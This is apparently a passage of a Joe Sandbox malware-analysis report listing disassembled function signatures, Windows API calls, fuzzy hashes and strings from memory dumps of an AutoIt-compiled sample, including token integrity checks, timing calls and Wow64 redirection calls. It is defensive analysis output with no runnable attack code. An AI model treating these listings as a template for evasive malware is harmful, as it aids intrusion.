              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
              • String ID:
              • API String ID: 3824534824-0
              • Opcode ID: d802c28b322b790937086c3f1a554d4d33ff08043fa56e492694f316c12bc4db
              • Instruction ID: 475beb83decc6bb8ff7f3ad83ad587a4b73c48789dcd20d160fdc1f760be4c8a
              • Opcode Fuzzy Hash: d802c28b322b790937086c3f1a554d4d33ff08043fa56e492694f316c12bc4db
              • Instruction Fuzzy Hash: C71121BA904789BBC7108FB8AC0CAAE7BACEB56320F144265FD18D3251C7B18C0087A1
              APIs
              • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 001D8766
              • GetLastError.KERNEL32(?,001D822A,?,?,?), ref: 001D8770
              • GetProcessHeap.KERNEL32(00000008,?,?,001D822A,?,?,?), ref: 001D877F
              • HeapAlloc.KERNEL32(00000000,?,001D822A,?,?,?), ref: 001D8786
              • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 001D879D
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
              • String ID:
              • API String ID: 842720411-0
              • Opcode ID: de1318c17ede0dd30edc0433a10c50992e75ad58f142a41ee3ab07069ebcee04
              • Instruction ID: ad29f52360dcd3c6199428ead1189a62d5fc6478111377fd16de0493f86941ea
              • Opcode Fuzzy Hash: de1318c17ede0dd30edc0433a10c50992e75ad58f142a41ee3ab07069ebcee04
              • Instruction Fuzzy Hash: 3801FB71641304EFDB204FA6ED8CD6BBBBDEF89755720056AF949C2261DB329D40CA60
              APIs
              • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 001E5502
              • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 001E5510
              • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 001E5518
              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 001E5522
              • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 001E555E
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: PerformanceQuery$CounterSleep$Frequency
              • String ID:
              • API String ID: 2833360925-0
              • Opcode ID: cf54992139f9f740b92056ebbe4855f985a20d7f9a161acff59678d6e9968011
              • Instruction ID: 8cdbf741d58fdfeccb8c2d1b62798b2b7e5362bb5aa7280c35711f95dcb6b2b4
              • Opcode Fuzzy Hash: cf54992139f9f740b92056ebbe4855f985a20d7f9a161acff59678d6e9968011
              • Instruction Fuzzy Hash: A6013931D00A19DBCF10ABE9E98C5EDBB7ABF09709F410056E805F2541DB30955087A1
              APIs
              • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,001D758C,80070057,?,?,?,001D799D), ref: 001D766F
              • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,001D758C,80070057,?,?), ref: 001D768A
              • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,001D758C,80070057,?,?), ref: 001D7698
              • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,001D758C,80070057,?), ref: 001D76A8
              • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,001D758C,80070057,?,?), ref: 001D76B4
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: From$Prog$FreeStringTasklstrcmpi
              • String ID:
              • API String ID: 3897988419-0
              • Opcode ID: e3a349efb5ef150f85accbf6b5486f9dba19ec9d0a8d0f3bb807014f1da88781
              • Instruction ID: c1474f5218df951d09e4dea7fdf93e10f0a6c27bebd22a81e16162239c0f1fd2
              • Opcode Fuzzy Hash: e3a349efb5ef150f85accbf6b5486f9dba19ec9d0a8d0f3bb807014f1da88781
              • Instruction Fuzzy Hash: F7018472601704BBEB209F58ED48BAA7BADEB44751F14402AFD04D2352F731DD40D7A0
              APIs
              • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 001D8608
              • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 001D8612
              • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 001D8621
              • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 001D8628
              • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 001D863E
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: HeapInformationToken$AllocErrorLastProcess
              • String ID:
              • API String ID: 44706859-0
              • Opcode ID: 4f2ae47f504521b0b4e471b3cf232b982dce6f7878d2f7e4a15df24f66f60b48
              • Instruction ID: cf0e1cc726b82a6ffb83ca38111b88e22e1840690c299a521e5ebf1b94c3e4fa
              • Opcode Fuzzy Hash: 4f2ae47f504521b0b4e471b3cf232b982dce6f7878d2f7e4a15df24f66f60b48
              • Instruction Fuzzy Hash: FCF06231245314AFEB200FA9ED8DE6B3BADEF89764B004426F949C6251CB71DC41DA60
              APIs
              • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 001D8669
              • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 001D8673
              • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 001D8682
              • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 001D8689
              • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 001D869F
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: HeapInformationToken$AllocErrorLastProcess
              • String ID:
              • API String ID: 44706859-0
              • Opcode ID: 4e967ffc48b91605fce4c1d87fb85eb009dfc4e5011aa6886b270aae02021216
              • Instruction ID: a3012a552ba0d80fcbf714b2e4903a24110e45c517c99cbc0bc9b7b94db1b7da
              • Opcode Fuzzy Hash: 4e967ffc48b91605fce4c1d87fb85eb009dfc4e5011aa6886b270aae02021216
              • Instruction Fuzzy Hash: 20F06D71280314BFEB211FA6EC8CE6B7BADEF89764B10002AF949C7251CB71DD41DA60
              APIs
              • GetDlgItem.USER32(?,000003E9), ref: 001DC6BA
              • GetWindowTextW.USER32(00000000,?,00000100), ref: 001DC6D1
              • MessageBeep.USER32(00000000), ref: 001DC6E9
              • KillTimer.USER32(?,0000040A), ref: 001DC705
              • EndDialog.USER32(?,00000001), ref: 001DC71F
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: BeepDialogItemKillMessageTextTimerWindow
              • String ID:
              • API String ID: 3741023627-0
              • Opcode ID: d53234bdaa09ca8ec0f35d9b944310f85ce3f5add25cc52e9aefe287a9b3dfa4
              • Instruction ID: e407ca40bdcec20937af345d01e400cf447274b7e6913b8de3f0365acd9e2e31
              • Opcode Fuzzy Hash: d53234bdaa09ca8ec0f35d9b944310f85ce3f5add25cc52e9aefe287a9b3dfa4
              • Instruction Fuzzy Hash: C8016230540705ABEB755B20ED8EF96B7BCFF00705F040A6AF592A19E1DBE1A954CF80
              APIs
              • EndPath.GDI32(?), ref: 001813BF
              • StrokeAndFillPath.GDI32(?,?,001BBAD8,00000000,?), ref: 001813DB
              • SelectObject.GDI32(?,00000000), ref: 001813EE
              • DeleteObject.GDI32 ref: 00181401
              • StrokePath.GDI32(?), ref: 0018141C
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Path$ObjectStroke$DeleteFillSelect
              • String ID:
              • API String ID: 2625713937-0
              • Opcode ID: d275d056a4b84e941f0742b1a09dd327dd5d984593dfc1ff2fd36e0344e7762c
              • Instruction ID: ba8663b6fe0192d69a22ed4ad04c66b4b061dac5e0f7ec5d52741408f74271f9
              • Opcode Fuzzy Hash: d275d056a4b84e941f0742b1a09dd327dd5d984593dfc1ff2fd36e0344e7762c
              • Instruction Fuzzy Hash: 33F0EC75044708EBDB666F26FD0C7583FA9A703726F04C224E829458F2C7314A9ADF51
              APIs
                • Part of subcall function 001A0FF6: std::exception::exception.LIBCMT ref: 001A102C
                • Part of subcall function 001A0FF6: __CxxThrowException@8.LIBCMT ref: 001A1041
                • Part of subcall function 00187F41: _memmove.LIBCMT ref: 00187F82
                • Part of subcall function 00187BB1: _memmove.LIBCMT ref: 00187C0B
              • __swprintf.LIBCMT ref: 0019302D
              Strings
              • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00192EC6
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
              • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
              • API String ID: 1943609520-557222456
              • Opcode ID: a10daa891cd506fd1c32b12193bf4268aacb0ee76497b74fbd9595ddc2f92d33
              • Instruction ID: 386fe89951f37faa2607591b3b411de3f0c4bc5796bdb0327767235515944e35
              • Opcode Fuzzy Hash: a10daa891cd506fd1c32b12193bf4268aacb0ee76497b74fbd9595ddc2f92d33
              • Instruction Fuzzy Hash: 06918935508301AFCB28FF24D895D6EB7A9EFA5740F14491DF4929B2A1DB30EE44CB52
              APIs
              • OleSetContainedObject.OLE32(?,00000001), ref: 001DB981
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: ContainedObject
              • String ID: AutoIt3GUI$Container$%!
              • API String ID: 3565006973-3188250632
              • Opcode ID: 123f2f2b0ba16f804868e46cfb21e0ca94defe206af96cb1212d6c820d8509b8
              • Instruction ID: d8caa19116b18c4d0670834e2585af87876a015f42f5e1e47e877a4f2f5422d8
              • Opcode Fuzzy Hash: 123f2f2b0ba16f804868e46cfb21e0ca94defe206af96cb1212d6c820d8509b8
              • Instruction Fuzzy Hash: 019148B4614201DFDB24DF28C884A6ABBE8FF49710F15856EF94ACB791DB70E840CB50
              APIs
              • __startOneArgErrorHandling.LIBCMT ref: 001A52DD
                • Part of subcall function 001B0340: __87except.LIBCMT ref: 001B037B
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: ErrorHandling__87except__start
              • String ID: pow
              • API String ID: 2905807303-2276729525
              • Opcode ID: 4d0465286e3d2374afe535f0e0f31940b2caaa0b7513d1547fc6ded36ab2a8dd
              • Instruction ID: 8fec0272fcc6da9001987ea6bd3dd8fcea4b782126fc221c335511afdd44c23b
              • Opcode Fuzzy Hash: 4d0465286e3d2374afe535f0e0f31940b2caaa0b7513d1547fc6ded36ab2a8dd
              • Instruction Fuzzy Hash: B4519B25E0CA01C7CB167724DA453FF2BE1BF96350F208D69E085822E9EF748CD49A82
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID:
              • String ID: #$+
              • API String ID: 0-2552117581
              • Opcode ID: 297612dc6ea885142ec816c684c13b125d1cc0b2a7cce78bda31ff9246f13b6c
              • Instruction ID: 089256a6c67b1f844cc43c6380fd11ab9aff7be84459d119b9c7424a49477fb5
              • Opcode Fuzzy Hash: 297612dc6ea885142ec816c684c13b125d1cc0b2a7cce78bda31ff9246f13b6c
              • Instruction Fuzzy Hash: 47512339504A45DFCF26AFA8C4886FA7BA6FF2A310F144056EC919B3A0D7349D42CB71
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: _memset$_memmove
              • String ID: ERCP
              • API String ID: 2532777613-1384759551
              • Opcode ID: 702e41c197d16216f43cecac59a0dda51ada1e1515eba8a6adfbbf666b08bfe2
              • Instruction ID: 86f87fa8f9fa8f8042bc75a88510787992f4c2360ae42eeeabe96ed122c02aac
              • Opcode Fuzzy Hash: 702e41c197d16216f43cecac59a0dda51ada1e1515eba8a6adfbbf666b08bfe2
              • Instruction Fuzzy Hash: 78519171900709EFDB24CFA5C8857AABBF4FF04714F20856EEA4ACB241E771A694CB50
              APIs
              • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 002076D0
              • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 002076E4
              • SendMessageW.USER32(?,00001002,00000000,?), ref: 00207708
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: MessageSend$Window
              • String ID: SysMonthCal32
              • API String ID: 2326795674-1439706946
              • Opcode ID: 93c48f054b66aa7a8823649f98ad2d7cd98d05229315ce61901d5a9024af78f9
              • Instruction ID: dc2ddeb7ea67aaef2c6745b761185565a9dbbc2f57f9b0dd25d6039d6dae235e
              • Opcode Fuzzy Hash: 93c48f054b66aa7a8823649f98ad2d7cd98d05229315ce61901d5a9024af78f9
              • Instruction Fuzzy Hash: 8021D132510219BBDF21CFA4CC46FEA3B79EF48714F110214FE156B1D1DAB2B8618BA0
              APIs
              • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00206FAA
              • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00206FBA
              • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00206FDF
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: MessageSend$MoveWindow
              • String ID: Listbox
              • API String ID: 3315199576-2633736733
              • Opcode ID: 237513b3913b559719637bd38eaea08fd9573222f4e37b408f375fa9d9c78a31
              • Instruction ID: 6c6c09c8a7371b9591e923c56dd159ee1d75f03bfe1957a230abedb1d305e7e8
              • Opcode Fuzzy Hash: 237513b3913b559719637bd38eaea08fd9573222f4e37b408f375fa9d9c78a31
              • Instruction Fuzzy Hash: F621B33262021ABFDF118F54EC8DFAB37AAEF89754F018124F915975D1C6719C618BA0
              APIs
              • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 002079E1
              • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 002079F6
              • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00207A03
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: MessageSend
              • String ID: msctls_trackbar32
              • API String ID: 3850602802-1010561917
              • Opcode ID: fb02094d20d500f4b2b98b5e28027573d0c97e658a73ce50a3b0dc701c489996
              • Instruction ID: 684835f8a226d4a925712aa10be9813ebb560730ae69b71f2eeaec5cb59eda76
              • Opcode Fuzzy Hash: fb02094d20d500f4b2b98b5e28027573d0c97e658a73ce50a3b0dc701c489996
              • Instruction Fuzzy Hash: A811E772654309BAEF209F60CC05F9B77ADEF89B64F014519F641A60D1D271A821CB60
              APIs
              • LoadLibraryA.KERNEL32(kernel32.dll,?,00184C2E), ref: 00184CA3
              • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00184CB5
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: AddressLibraryLoadProc
              • String ID: GetNativeSystemInfo$kernel32.dll
              • API String ID: 2574300362-192647395
              • Opcode ID: cdba3c10c1a334b905ed29e00a1905b844b8d87e0e51c2150ddb6bc54ad3e015
              • Instruction ID: 3b1be767838ac20a98751297e18cdcfef138a3bc4a142767ebbf802d9913903e
              • Opcode Fuzzy Hash: cdba3c10c1a334b905ed29e00a1905b844b8d87e0e51c2150ddb6bc54ad3e015
              • Instruction Fuzzy Hash: C5D01230550723CFD770AF31DB18606B6D9AF09755B1188399885D6991DB74D480CF50
              APIs
              • LoadLibraryA.KERNEL32(kernel32.dll,?,00184D2E,?,00184F4F,?,002462F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00184D6F
              • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00184D81
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: AddressLibraryLoadProc
              • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
              • API String ID: 2574300362-3689287502
              • Opcode ID: 151766a21516810cd769b0ed8adb8c4b74f3917c52b1318dcb29b71ef180418d
              • Instruction ID: 754237ed30448e2ae0ccb91d76309b987f5d5ccf27388e35c514900129987267
              • Opcode Fuzzy Hash: 151766a21516810cd769b0ed8adb8c4b74f3917c52b1318dcb29b71ef180418d
              • Instruction Fuzzy Hash: 0ED01270550713CFD7309F71D908616B6D8BF15351B118D39988AD6650DB70D480CF50
              APIs
              • LoadLibraryA.KERNEL32(kernel32.dll,?,00184CE1,?), ref: 00184DA2
              • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00184DB4
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: AddressLibraryLoadProc
              • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
              • API String ID: 2574300362-1355242751
              • Opcode ID: 452c7b22314af0377b8686b32570c584de4cf246817d78cd5785ba6798685251
              • Instruction ID: 803604ffaec0440337e5434068c68f3ea09d551348b075376918f54f9fb689d0
              • Opcode Fuzzy Hash: 452c7b22314af0377b8686b32570c584de4cf246817d78cd5785ba6798685251
              • Instruction Fuzzy Hash: 21D012715A0713CFD7309F71D908646B6D4AF19355B118839D8C5D6550DB70D480CB50
              APIs
